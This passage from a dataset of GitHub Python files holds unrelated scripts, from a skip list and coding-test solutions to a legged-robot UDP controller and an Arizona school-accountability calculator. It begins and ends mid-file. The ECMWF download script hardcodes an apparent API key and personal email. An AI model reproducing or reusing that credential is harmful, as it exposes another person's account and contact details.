into the level\n '''\n # define the top head\n new_head = Start_Node()\n new_head.refer_node = self.top_head\n self.top_head = new_head\n # define the new_node\n new_node = Ref_Node(new_obj)\n # add the head and the tail to it\n self.top_head.next_node = new_node\n # if the level is the first\n if level == start:\n # refer itself to the bottom_node\n new_node.refer_node = bottom_node\n else:\n # get the node which should be the bottom node in this case\n node = self.create_level(new_obj, level - step, bottom_node)\n # refer the new_node to the bottom node in this case\n new_node.refer_node = node\n new_tail = End_Node()\n new_node.next_node = new_tail\n new_tail.refer_node = self.top_tail\n self.top_tail = new_tail\n return new_node\n\n def level_generator(self):\n '''(SkipList) -> int\n Return the number of level it generated\n '''\n # initiate the number of level at 0\n level = 1\n # if the number generated by the random is smaller than the probability\n # the number of level will increase by each unit of step\n while random.uniform(0, 1) < self.probability:\n level += step\n # return the level\n return level\n\n def insert(self, new_obj):\n '''(SkipList, obj) -> Nonetype\n '''\n if self.level == 0:\n self.__init__()\n # generate the levels the number should be added\n level = self.level_generator()\n # just add the obj to the levels it's supposed to go to\n if level <= self.level:\n self.add_to_level(new_obj, level)\n else:\n # if its level surpassed the level of the skiplist, add to existing\n # level and create new ones\n new_node = self.add_to_level(new_obj, self.level)\n self.create_level(new_obj, (level - self.level), new_node)\n self.level = level\n self.length += 1\n\n def 
remove_level(self):\n while type(self.top_head.next_node) == End_Node:\n self.top_head = self.top_head.refer_node\n self.top_tail = self.top_tail.refer_node\n self.level -= step\n if self.top_head is None:\n return\n\n def remove(self, obj):\n head_node = self.top_head\n while head_node is not None:\n node = head_node\n while node is not None:\n if node.next_node is not None:\n if node.next_node.data == obj:\n target_node = node.next_node\n while target_node.data == obj:\n if type(target_node) == Node:\n self.length -= 1\n target_node = target_node.next_node\n node.next_node = target_node\n node = node.next_node\n head_node = head_node.refer_node\n self.remove_level()\n\n def search(self, new_obj):\n '''(SkipList, obj) -> obj\n It can find whether the obj is contained in the skiplist. If it does,\n return the node. Or it should return None.\n '''\n head = self.top_head\n while head is not None:\n node = head\n while node is not None:\n if node.data == new_obj:\n while type(node) == Ref_Node:\n node = node.refer_node\n return node\n node = node.next_node\n head = head.refer_node\n return\n","repo_name":"Gaotao22/CSCA08-48","sub_path":"skiplist.py","file_name":"skiplist.py","file_ext":"py","file_size_in_byte":12190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"541383946","text":"import json\n\nwith open(\"faturamentoEstados.json\") as dados:\n faturamentoEstados = json.load(dados)\n\n\nfaturamentoTotal = 0\nfor faturamento in faturamentoEstados:\n faturamentoTotal += faturamento['valor']\n\na = 0\nfor faturamento in faturamentoEstados:\n porcentagemFaturamento = (faturamento['valor']*100) / faturamentoTotal\n print(\"{0}:{1}%\".format(faturamento['estado'], round(porcentagemFaturamento, 2)))\n\n","repo_name":"igorspatricio/TargetSistemasTeste","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38563751201","text":"T = int(input())\nfor test_case in range(1, T + 1):\n N, D = map(int, input().split())\n area = 1 + 2 * D\n check = 0\n count = 0\n \n while N > check:\n check += area\n count += 1\n \n print(f'#{test_case} {count}')","repo_name":"jaemoon99/CodingTest","sub_path":"SWEA/D3/14178. 
1차원 정원/1차원 정원.py","file_name":"1차원 정원.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7503020597","text":"# EE 140 course at San José State University (SJSU)\n# CLI program to compute values for transmission line theory\n# This program computes values for VSWR, ρ, RL\n# https://github.com/BradleyHo\n\nimport math\n\n# This function computes ρ from VSWR\ndef rcvswr(x):\n y = (x-1)/(x+1) # ρ\n return y\n \n# This function computes RL from VSWR\ndef rlvswr(x):\n z = -20*math.log(rcvswr(x),10) if rcvswr(x) != 0 else \"∞\" # RL\n return z\n\n# This function computes VSWR from ρ\ndef vswrrc(y):\n x = (1+y)/(1-y) if y != 1 else \"∞\" # VSWR\n return x\n \n# This function computes RL from ρ\ndef rlrc(y):\n z = -20*math.log(y,10) if y != 0 else \"∞\" # RL\n if z == 0:\n z = 0.0\n return z\n\n# This function computes ρ from RL\ndef rcrl(z):\n y = math.pow(10, -z/20) # ρ\n return y\n\n# This function computes VSWR from RL\ndef vswrrl(z):\n x = (1+rcrl(z))/(1-rcrl(z)) if z != 0 else \"∞\" # VSWR\n return x\n\n# Tell the user our menu options\nprint(\"Select a given parameter below to solve for the two others:\")\nprint(\"1. Voltage standing wave ratio - VSWR\")\nprint(\"2. Reflection coefficient - ρ = |Γ|\")\nprint(\"3. Return loss - RL (dB)\")\nprint(\"___________________________________________________________\")\n\nwhile True:\n # Take the input choice from the user\n choice = input(\"Enter choice (1/2/3):\")\n\n # Check if the choice is valid: 1 of the 3 options\n if choice in ('1', '2', '3'):\n num1 = float(input(\"Enter the value for chosen parameter:\"))\n\n # 1 input: VSWR\n # 2 outputs: ρ, RL\n if choice == '1':\n print(\"Given: VSWR =\", num1)\n print(\"ρ =\", rcvswr(num1))\n print(\"RL =\", rlvswr(num1), \"dB\")\n\n # 1 input: ρ\n # 2 outputs: VSWR, RL\n elif choice == '2':\n print(\"VSWR =\", vswrrc(num1))\n print(\"Given: ρ =\", num1)\n print(\"RL =\", rlrc(num1), \"dB\")\n\n # 1 input: RL\n # 2 outputs: VSWR, ρ\n elif choice == '3':\n print(\"VSWR =\", vswrrl(num1))\n print(\"ρ =\", rcrl(num1))\n print(\"Given: RL =\", num1, \"dB\")\n \n # Check if the user wants another calculation\n # Repeatedly ask the user to enter a valid option yes or no (y/n) if input does not match \n # Break the while loop if answer is n\n # Otherwise, the default is y to continue the next calculation\n next_calculation = input(\"Perform another calculation? (y/n):\")\n while next_calculation.lower() not in (\"y\",\"n\"):\n next_calculation = input(\"Invalid input. Enter choice (y/n): \")\n if next_calculation == \"n\":\n print(\"I hope it was useful. Good luck in EE 140!\")\n break\n # Within the main while loop, accept either 1 of the 3 choices from the user if it is valid\n # Otherwise, repeatedly ask the user to input 1 or 2 or 3 (1/2/3) if the input does not match\n else:\n print(\"Invalid input. 
Enter (1/2/3):\")","repo_name":"BradleyHo/ee140","sub_path":"transmission-line-calculator.py","file_name":"transmission-line-calculator.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27900370617","text":"\"\"\"added file url field for a file attachment\n\nRevision ID: db979b4a69f7\nRevises: dc6a15385526\nCreate Date: 2022-04-28 12:56:04.398328\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'db979b4a69f7'\ndown_revision = 'dc6a15385526'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('project_review_records', sa.Column('file_url', sa.Text(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('project_review_records', 'file_url')\n # ### end Alembic commands ###\n","repo_name":"likit/stin-research-is","sub_path":"erm/migrations/versions/db979b4a69f7_added_file_url_field_for_a_file_.py","file_name":"db979b4a69f7_added_file_url_field_for_a_file_.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"21019487810","text":"from sys import stdin\nMAX = int(1e9)\nn = int(stdin.readline())\ndata = [0] * 1000001\ndata[0] = MAX\ndata[1] = 0\ndata[2] = 1\n\ncnt = 0\nfor i in range(2,n+1) :\n if i%3==0 :\n save1 = i//3\n else :\n save1 = 0\n\n if i%2==0 :\n save2 = i//2\n else :\n save2 = 0\n\n data[i] = min(data[save1],data[save2],data[i-1]) + 1\n \nprint(data[n])","repo_name":"kim-jinseop/CodingTest","sub_path":"백준/Silver/1463. 
1로 만들기/1로 만들기.py","file_name":"1로 만들기.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39801549278","text":"#!/usr/bin/env python\nimport os\nfrom ecmwfapi import ECMWFDataServer\n\n\n\"\"\"\nAPI for downloading ERA-iterim data from ecmwf servers \n\"\"\"\n\n# data request params\nserver = ECMWFDataServer(url=\"https://api.ecmwf.int/v1\",key=\"dd2d771484943ef8d9092a9607855a00\",email=\"evbecker@ucla.edu\")\nvar_name = 'precip'\nstart_year=2009\nend_year=2019\n\nfor year in range(start_year, end_year):\n print(f'YEAR IS: {year}')\n if var_name == 'precip':\n # configured to retrieve precipitation totals\n server.retrieve({\n \"class\": \"ei\",\n \"dataset\": \"interim\",\n \"date\": f'{year}-01-01/to/{year}-12-31',\n \"expver\": \"1\",\n \"grid\": \"0.75/0.75\",\n \"levtype\": \"sfc\",\n \"param\": \"228.128\",\n \"step\": \"12\",\n \"stream\": \"oper\",\n \"time\": \"00:00:00/12:00:00\",\n \"type\": \"fc\",\n 'format' : \"netcdf\",\n \"target\": f'erai-{year}-precip.nc',\n })\n elif var_name == 'temp':\n # configured to retrieve max 2m temperatures\n server.retrieve({\n \"class\": \"ei\",\n \"dataset\": \"interim\",\n \"date\": f'{year}-01-01/to/{year}-12-31',\n \"expver\": \"1\",\n \"grid\": \"0.75/0.75\",\n \"levtype\": \"sfc\",\n \"param\": \"201.128\",\n \"step\": \"12\",\n \"stream\": \"oper\",\n \"time\": \"00:00:00/12:00:00\",\n \"type\": \"fc\",\n 'format' : \"netcdf\",\n \"target\": f'erai-{year}-temp.nc',\n })","repo_name":"evbecker/climate-spatial-downscaling","sub_path":"data_utils/erai_retrieval.py","file_name":"erai_retrieval.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"8942775854","text":"from my_classes import AddressBook\n\n\ndef create_address_book():\n \"\"\"\n Instantiate and populate an AddressBook object\n \"\"\"\n return AddressBook({\n 'first_name': 'Henry',\n 'last_name': 'Ferguson',\n 'phone': '(555) 123-4567',\n 'email': 'henry_ferguson11882@gmail.com',\n 'birthday': {\n 'day': '12',\n 'month': '11',\n 'year': '1984',\n },\n 'address': {\n 'address1': '123 Bomb St.',\n 'address2': 'Apt. 213A',\n 'city': 'Denver',\n 'state': 'Colorado',\n 'postal_code': '80224',\n 'country': 'USA',\n },\n })\n\n\ndef add_content1(ab1):\n \"\"\"\n Add content to ab1\n \"\"\"\n ab1.add_content({\n 'first_name': 'Jeff',\n 'last_name': 'Ferguson',\n 'phone': '(555) 555-5555',\n 'email': 'jeff_ferguson7272@gmail.com',\n 'birthday': {\n 'day': '3',\n 'month': '6',\n 'year': '2011',\n },\n 'address': {\n 'address1': '123 Bomb St.',\n 'address2': 'Apt. 213A',\n 'city': 'Denver',\n 'state': 'Colorado',\n 'postal_code': '80224',\n 'country': 'USA',\n },\n })\n return ab1\n\n\ndef add_content2(ab2):\n \"\"\"\n Add content to ab2\n \"\"\"\n ab2.add_content({\n 'first_name': 'Martha',\n 'last_name': 'Ferguson',\n 'phone': '(123) 456-7890',\n 'email': 'martha_ferguson665@gmail.com',\n 'birthday': {\n 'day': '22',\n 'month': '2',\n 'year': '1987',\n },\n 'address': {\n 'address1': '321 Awesome St.',\n 'address2': 'Apt. 
332B',\n 'city': 'Denver',\n 'state': 'Colorado',\n 'postal_code': '80203',\n 'country': 'USA',\n },\n })\n return ab2\n\n\ndef create_address_books():\n ab1 = create_address_book()\n ab1 = add_content1(ab1)\n ab2 = create_address_book()\n ab2 = add_content2(ab2)\n return ab1, ab2\n\n","repo_name":"ricomoss/learn-tech","sub_path":"python/presentations/override_magic_methods/setup_address_books.py","file_name":"setup_address_books.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"1039838324","text":"import socket\nimport struct\nimport threading\nimport time\nfrom typing import Union\n\nfrom robosdk.common.class_factory import ClassFactory\nfrom robosdk.common.class_factory import ClassType\nfrom robosdk.common.config import Config\nfrom robosdk.common.constant import GaitType\n\nfrom .base import LeggedControl\n\n__all__ = (\"DeepRoboticsControl\",)\n\n\nclass RobotCommander:\n \"\"\"\n Copyright (c) Deep Robotics Inc. - All Rights Reserved\n Unauthorized copying of this file, via any medium is strictly prohibited\n Proprietary and confidential\n Author: Haoyi Han , Feb, 2020\n \"\"\"\n\n _command_code = {\n \"STAND_UP_DOWN\": 1,\n \"START_FORCE_MODE\": 2,\n \"MOTION_START_STOP\": 3,\n \"DANCE\": 19,\n \"CHANGE_GAIT\": 25,\n \"HEART_BEAT\": 33\n }\n\n def __init__(self,\n local_port=20001,\n ctrl_ip='192.168.1.120',\n ctrl_port=43893):\n self.local_port = local_port\n self.server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\n self.ctrl_addr = (ctrl_ip, ctrl_port)\n\n def __enter__(self):\n self.server.bind(('0.0.0.0', self.local_port))\n self._keep_alive = True\n self.comm_lock = threading.Lock()\n self.keep_alive_thread = threading.Thread(target=self.keep_alive,\n name=\"keep_alive\")\n self.keep_alive_thread.setDaemon(True)\n self.keep_alive_thread.start()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.server = None\n self._keep_alive = False\n self.keep_alive_thread.join()\n\n def keep_alive(self):\n while self._keep_alive:\n self.sendSimpleCommand(\"HEART_BEAT\", verbose=False)\n time.sleep(0.25)\n\n def sendSimple(self, command_code=25, command_value=0, command_type=0):\n data = struct.pack('<3i', command_code, command_value, command_type)\n self.comm_lock.acquire()\n self.server.sendto(data, self.ctrl_addr)\n self.comm_lock.release()\n\n def sendSimpleCommand(self, command_name, verbose=True):\n self.sendSimple(self._command_code[command_name])\n\n def stand_down_up(self):\n self.sendSimpleCommand(\"STAND_UP_DOWN\")\n\n def dance(self):\n self.sendSimpleCommand(\"DANCE\")\n\n def start_force_mode(self):\n self.sendSimpleCommand(\"START_FORCE_MODE\")\n\n def motion_start_stop(self):\n self.sendSimpleCommand(\"MOTION_START_STOP\")\n\n def yaw_adjust(self, adjust_rad):\n self.sendSimple(33, int(adjust_rad * 1000))\n\n def up_stair_trait(self):\n self.sendSimple(7)\n\n def finish_up_stair_trait(self):\n self.sendSimple(7)\n\n def down_stair_trait(self):\n self.sendSimple(7)\n time.sleep(0.1)\n self.sendSimple(2)\n\n def finish_down_stair_trait(self):\n self.sendSimple(2)\n time.sleep(0.1)\n self.sendSimple(7)\n\n\n@ClassFactory.register(ClassType.CONTROL, alias=\"ysc_control\")\nclass DeepRoboticsControl(LeggedControl): # noqa\n\n def __init__(self, name: str = \"ysc\", config: Config = None):\n super(DeepRoboticsControl, self).__init__(name=name, config=config)\n\n self._GAIT_CODE = {\n 0: GaitType.LIEON,\n 1: GaitType.STAND,\n 2: GaitType.HOLD,\n 
3: GaitType.TROT,\n 10: GaitType.FALL,\n 11: GaitType.UPSTAIR,\n }\n self.msg_lock = threading.RLock()\n self.curr_gait = GaitType.UNKONWN\n self.commander = RobotCommander(\n local_port=self.config.parameter.local_port,\n ctrl_port=self.config.parameter.ctrl_port,\n ctrl_ip=self.config.parameter.ctrl_ip,\n )\n parameters = getattr(self.config, \"gait_subscribe\", None) or {}\n self.gait_sub = self.backend.subscribe(\n self.config.parameter.gait_topic,\n callback=self.gait_listen, **parameters\n )\n\n def gait_listen(self, msg):\n self.msg_lock.acquire()\n if not msg:\n self.curr_gait = GaitType.UNKONWN\n else:\n data = int(msg.data)\n if data in self._GAIT_CODE:\n self.curr_gait = self._GAIT_CODE[data]\n else:\n try:\n self.curr_gait = GaitType(data)\n except ValueError:\n self.curr_gait = GaitType.UNKONWN\n self.msg_lock.release()\n\n def connect(self):\n self.commander.__enter__()\n\n def get_curr_gait(self) -> GaitType:\n return self.curr_gait\n\n def change_gait(self, gait: Union[str, GaitType]):\n if isinstance(gait, str):\n gait = getattr(GaitType, gait.upper())\n self.logger.info(f\"try to change gait to {gait.name}\")\n prev_gait = self.get_curr_gait()\n try_times = len(GaitType)\n sleep_time = 1.0 / try_times\n while try_times:\n now_gait = self.get_curr_gait()\n if now_gait == gait:\n break\n if prev_gait == now_gait:\n self.commander.sendSimple()\n time.sleep(sleep_time)\n continue\n prev_gait = now_gait\n self.commander.sendSimple()\n try_times -= 1\n time.sleep(sleep_time)\n","repo_name":"KubeEdge4Robotics/robosdk","sub_path":"robosdk/control/legged/ysc_control.py","file_name":"ysc_control.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"99"} +{"seq_id":"26239072377","text":"\"\"\"\nAuthors: ADE Accountability & Research\n\nLast Updated: 05/25/2023\n\nDescription: This Python module contains a Growth_to_Grad class capable of producing the results from the Growth to Graduation component of the Arizona State A-F Letter Grades \n(https://www.azed.gov/accountability-research/state-accountability). In order to calculate points, one will need to provide a version of the Accountability Static File ().\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom COMPONENTS import COMPONENTS\nfrom DATABASE import DATABASE\n\n\"\"\"\nThis class contains methods for creating Pandas DataFrames that contain the Summary Growth to Graduation information present on ADEConnect for alternative schools. To find this information, navigate to \n adeconnect.azed.gov/ -> View Applications -> Accountability -> Accountability: State and Federal Profile.\n\"\"\"\nclass GTG(COMPONENTS):\n \"\"\"\n Constructor for Growth to Graduation. This class inherits from COMPONENTS, which contains variables and functionality that is shared across the different A-F Letter Grades Components.\n \"\"\"\n def __init__(self, fiscal_year:int=None, run='Prelim', **kwargs):\n \"\"\"\n Parameters:\n ----------\n fiscal_year (int): The current AZ D.O.E. 
fiscal year\n \"\"\"\n super().__init__(fiscal_year=fiscal_year, run=run, **kwargs)\n self.necessary_columns = [\"FiscalYear\", \"SchoolCode\", \"Alternative\"]\n self.max_persistence_points = 10\n self.max_credits_earned_points = 10\n self.max_OT2G_points = 10\n self.db = DATABASE(self.fiscal_year)\n \n \"\"\"\n This method takes a version of the Static File, obtains a list of unique alternative schools from it, and calls methods to access \n the database to obtain the necessary Persistence Rate, Credits Earned, & On Track To Graduate related results for the Growth To \n Graduation component. \n \"\"\"\n def calculate_component(self, static_file:pd.DataFrame):\n \"\"\"\n Parameters:\n ----------\n static_file (pd.DataFrame): A version of the Static File (FY 2023 or beyond). It must contain the following columns: FiscalYear, SchoolCode, Alternative\n\n Returns:\n ----------\n pd.DataFrame: A dataframe containing all of the Proficiency information that is shown in the ADEConnect State Letter Grades summary and drilldown tables. Columns contain\n suffixes that denote the page on ADEConnect in which they appear\n \"\"\"\n if not set(self.necessary_columns).issubset(static_file.columns): \n missing_columns = [x for x in self.necessary_columns if x not in static_file.columns]\n raise ValueError(f\"The DataFrame argument \\\"static_file\\\" is missing the following columns: {missing_columns}.\")\n \n # get a list of alternative schools to filter for when retrieving results from the database\n alternative_schools = list(static_file[static_file[\"Alternative\"]==1][\"SchoolCode\"].unique())\n\n # gather results\n persistence_results = self.persistence_points(alternative_schools).set_index([\"EntityID\"])\n credits_earned_results = self.credits_earned_points(alternative_schools).set_index([\"EntityID\"])\n on_track_to_graduate_results = self.on_track_to_graduate_points(alternative_schools).set_index([\"EntityID\"])\n\n # combine results\n all_results = pd.concat([persistence_results, credits_earned_results, on_track_to_graduate_results], axis=1).reset_index()\n\n # add additional point columns\n new_cols = [\"AcademicPersistence\", \"CreditsEarned\", \"OnTracktoGraduate\"]\n existing_cols = [\"GTGAcademicPersistenceTP\", \"GTGCreditsEarnedTotalpoints\", \"GTGOnTrackToGradTotalpoints\"]\n for col1, col2 in zip(new_cols, existing_cols):\n all_results[col1] = all_results[col2].copy()\n\n # add Model column\n columns = all_results.columns\n all_results[\"Model\"] = \"Alt 9-12\"\n all_results = all_results[[\"Model\"] + list(columns)] # reorder to put Model first. This is not necessary but is nice for validating\n all_results['FiscalYear'] = self.fiscal_year\n\n return all_results\n \n\n \"\"\"\n Connects to database and obtains already-calculated persistence counts and rates. Points are determined from the persistence rate.\n \"\"\"\n def persistence_points(self, alternative_schools:list):\n sql = f\"\"\"\n SELECT \n [EntityID]\n ,[PYEligibleCount] AS GTGAcademicPersistenceDen\n ,[CYEnrolledCount] AS GTGAcademicPersistenceNum\n ,[PersistenceRate]*100 AS GTGAcadPersistencePctEarned \n FROM [AccountabilityArchive].[Static].[{self.run}PersistRate{self.fiscal_year}]\n WHERE FiscalYear = {self.fiscal_year} \n AND EntityID IN {tuple(alternative_schools)}\"\"\"\n persistence_rates = self.db.read_sql_query(sql=sql)\n\n # assign points. 
All alt schools are eligible for points\n persistence_rates[\"GTGAcademicPersistencePctAvlbl\"] = 100\n\n # limit points\n persistence_rates[\"GTGAcademicPersistenceTP\"] = np.minimum(self.max_persistence_points, persistence_rates[\"GTGAcadPersistencePctEarned\"]/10)\n return persistence_rates\n\n \"\"\"\n Connects to database to obtain already-calculated Credits-Earned counts and points\n \"\"\"\n def credits_earned_points(self, alternative_schools:list):\n \n sql = f\"\"\"\n SELECT \n [SchoolID] AS EntityID\n , [TotalStudents] AS GTGCreditsEarnedDen\n , [TotalGraduates] AS GTGCreditsEarnedNum\n , [Points] AS GTGCreditsEarnedTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[Static].[{self.run}CE{self.fiscal_year}]\n WHERE FiscalYear = {self.fiscal_year} \n AND SchoolID IN {tuple(alternative_schools)}\"\"\"\n credits_earned = self.db.read_sql_query(sql=sql)\n if self.include_late_submissions:\n credits_earned = self.add_late_ce_submissions(credits_earned, alternative_schools)\n # limit points\n credits_earned[\"GTGCreditsEarnedTotalpoints\"] = np.minimum(self.max_credits_earned_points, credits_earned[\"GTGCreditsEarnedTotalpoints\"])\n\n # assign points to eligible schools\n eligible_schools = (credits_earned[\"IsEligible\"]==1)\n credits_earned.loc[eligible_schools, \"GTGCreditsEarnedPctEarned\"] = credits_earned.loc[eligible_schools, \"GTGCreditsEarnedNum\"]/credits_earned.loc[eligible_schools,\"GTGCreditsEarnedDen\"]*100\n credits_earned.loc[eligible_schools, \"GTGCreditsEarnedPctAvlbl\"] = 100\n\n # assign points to ineligible schools\n ineligible_schools = (credits_earned[\"IsEligible\"]==0)\n credits_earned.loc[ineligible_schools, [\"GTGCreditsEarnedPctEarned\", \"GTGCreditsEarnedPctAvlbl\"]] = [np.nan, np.nan]\n\n # assign points to schools that did not submit\n not_reported_schools = credits_earned[\"IsEligible\"].isna()\n credits_earned.loc[not_reported_schools, [\"GTGCreditsEarnedTotalpoints\", \"GTGCreditsEarnedPctAvlbl\"]] = [0, 100]\n credits_earned = credits_earned.drop(columns=[\"IsEligible\"])\n\n return credits_earned\n\n\n \"\"\"\n Connects to database to obtain already-calculated On-Track-To-Graduate counts and points\n \"\"\"\n def on_track_to_graduate_points(self, alternative_schools:list):\n sql = f\"\"\"\n SELECT \n [SchoolID] AS EntityID\n , [TotalStudents] AS GTGOnTrackToGradDen\n , [TotalGraduates] AS GTGOnTrackToGradNum\n , [Points] AS GTGOnTrackToGradTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[Static].[{self.run}OTG{self.fiscal_year}]\n WHERE FiscalYear = {self.fiscal_year} \n AND SchoolID IN {tuple(alternative_schools)}\n \"\"\"\n on_track_to_graduate = self.db.read_sql_query(sql=sql)\n if self.include_late_submissions:\n on_track_to_graduate = self.add_late_otg_submissions(on_track_to_graduate, alternative_schools)\n # limit points\n on_track_to_graduate[\"GTGOnTrackToGradTotalpoints\"] = np.minimum(self.max_OT2G_points, on_track_to_graduate[\"GTGOnTrackToGradTotalpoints\"])\n\n # assign points to eligible schools\n eligible_schools = (on_track_to_graduate[\"IsEligible\"]==1)\n on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradPctEarned\"] = on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradNum\"]/on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradDen\"]*100\n on_track_to_graduate.loc[eligible_schools, \"GTGOnTrackToGradPctAvlbl\"] = 100\n\n # assign points to ineligible schools\n ineligible_schools = (on_track_to_graduate[\"IsEligible\"]==0)\n on_track_to_graduate.loc[ineligible_schools, 
[\"GTGOnTrackToGradPctEarned\", \"GTGOnTrackToGradPctAvlbl\"]] = [np.nan, np.nan]\n\n # assign points to schools that did not submit\n not_reported_schools = on_track_to_graduate[\"IsEligible\"].isna()\n on_track_to_graduate.loc[not_reported_schools, [\"GTGOnTrackToGradTotalpoints\", \"GTGOnTrackToGradPctAvlbl\"]] = [0, 100]\n\n on_track_to_graduate = on_track_to_graduate.drop(columns=[\"IsEligible\"]) # drop eligibility column since we do not report it\n\n return on_track_to_graduate\n \n def fetch_late_otg_submissions(self, alternative_schools):\n db = DATABASE(fiscal_year=self.fiscal_year, database='AccountabilityArchive', schema='dbo', run='', server_name='AACTASTPDDBVM02')\n sql = f\"\"\"select \n [SchoolID] AS EntityID\n , n_stu_elig AS GTGOnTrackToGradDen\n , n_stu_met AS GTGOnTrackToGradNum\n , [Points] AS GTGOnTrackToGradTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[dbo].[LateLateSelfReportedData]\n Where FiscalYear={self.fiscal_year} and type='otg'\n AND SchoolID IN {tuple(alternative_schools)}\"\"\"\n late_otg = db.read_sql_query(sql=sql)\n return late_otg\n \n def add_late_otg_submissions(self, on_track_to_graduate, alternative_schools):\n \n late_otg = self.fetch_late_otg_submissions(alternative_schools)\n late_otg['IsEligible'] = late_otg['IsEligible'].apply(lambda x: True if x==1 else False)\n \n #delete the late submission value from original table and add new data\n on_track_to_graduate = on_track_to_graduate[~on_track_to_graduate.EntityID.isin(late_otg.EntityID)].copy()\n on_track_to_graduate = pd.concat([on_track_to_graduate, late_otg], axis=0)\n \n return on_track_to_graduate\n \n def fetch_late_ce_submissions(self, alternative_schools):\n db = DATABASE(fiscal_year=self.fiscal_year, database='AccountabilityArchive', schema='dbo', run='', server_name='AACTASTPDDBVM02')\n sql = f\"\"\"select \n [SchoolID] AS EntityID\n , n_stu_elig AS GTGCreditsEarnedDen\n , n_stu_met AS GTGCreditsEarnedNum\n , [Points] AS GTGCreditsEarnedTotalpoints\n , [IsEligible]\n FROM [AccountabilityArchive].[dbo].[LateLateSelfReportedData]\n Where FiscalYear={self.fiscal_year} and type='CE'\n AND SchoolID IN {tuple(alternative_schools)}\"\"\"\n late_ce = db.read_sql_query(sql=sql)\n return late_ce\n \n def add_late_ce_submissions(self, credits_earned, alternative_schools):\n \n late_ce = self.fetch_late_ce_submissions(alternative_schools)\n late_ce['IsEligible'] = late_ce['IsEligible'].apply(lambda x: True if x==1 else False)\n \n #delete the late submission value from original table and add new data\n credits_earned = credits_earned[~credits_earned.EntityID.isin(late_ce.EntityID)].copy()\n credits_earned = pd.concat([credits_earned, late_ce], axis=0)\n \n return credits_earned\n \n\n\n# fy= 2023\n# run = 'PrelimV6'\n# self = GTG(fy, run)\n# staticfile = DATABASE(fiscal_year = fy\n# ,run = run\n# ,schema = 'Static'\n# ,database = 'AccountabilityArchive').read_table(table_name ='StaticFile')\n# static_file = staticfile.copy()\n","repo_name":"Yassinfahmy/ArizonaDepartmentofEducation","sub_path":"StateCode/GTG.py","file_name":"GTG.py","file_ext":"py","file_size_in_byte":12327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11488164097","text":"from itertools import chain\nfrom operator import itemgetter\nfrom typing import Dict, Iterable, List, Optional, Sized, Tuple, Union\n\nimport pandas as pd\nfrom pandas.api.types import is_object_dtype\nfrom typing_extensions import TypeAlias, TypeGuard\n\nfrom phoenix import Dataset, 
EmbeddingColumnNames\nfrom phoenix.core.model import _get_embedding_dimensions\nfrom phoenix.core.model_schema import Embedding, Model, RetrievalEmbedding, Schema\nfrom phoenix.datasets.schema import RetrievalEmbeddingColumnNames\nfrom phoenix.datasets.schema import Schema as DatasetSchema\n\nDatasetName: TypeAlias = str\nColumnName: TypeAlias = str\nDisplayName: TypeAlias = str\n\n\ndef create_model_from_datasets(*datasets: Optional[Dataset]) -> Model:\n # TODO: move this validation into model_schema.Model.\n if len(datasets) > 1 and datasets[0] is not None:\n # Check that for each embedding dimension all vectors\n # have the same length between datasets.\n _ = _get_embedding_dimensions(datasets[0], datasets[1])\n\n named_dataframes: List[Tuple[DatasetName, pd.DataFrame]] = []\n prediction_ids: List[ColumnName] = []\n timestamps: List[ColumnName] = []\n prediction_labels: List[ColumnName] = []\n prediction_scores: List[ColumnName] = []\n actual_labels: List[ColumnName] = []\n actual_scores: List[ColumnName] = []\n features: List[ColumnName] = []\n tags: List[ColumnName] = []\n embeddings: Dict[DisplayName, EmbeddingColumnNames] = {}\n prompts: List[EmbeddingColumnNames] = []\n responses: List[Union[str, EmbeddingColumnNames]] = []\n\n for dataset in filter(_is_dataset, datasets):\n df = dataset.dataframe\n # Coerce string column names at run time.\n df = df.set_axis(\n map(str, df.columns),\n axis=1,\n )\n named_dataframes.append((dataset.name, df))\n dataset_schema = dataset.schema if dataset.schema is not None else DatasetSchema()\n for display_name, embedding in (\n dataset_schema.embedding_feature_column_names or {}\n ).items():\n if display_name not in embeddings:\n embeddings[display_name] = embedding\n if dataset_schema.prompt_column_names is not None:\n prompts.append(dataset_schema.prompt_column_names)\n if dataset_schema.response_column_names is not None:\n responses.append(dataset_schema.response_column_names)\n for source, sink in (\n ([dataset_schema.prediction_id_column_name], prediction_ids),\n ([dataset_schema.timestamp_column_name], timestamps),\n ([dataset_schema.prediction_label_column_name], prediction_labels),\n ([dataset_schema.prediction_score_column_name], prediction_scores),\n 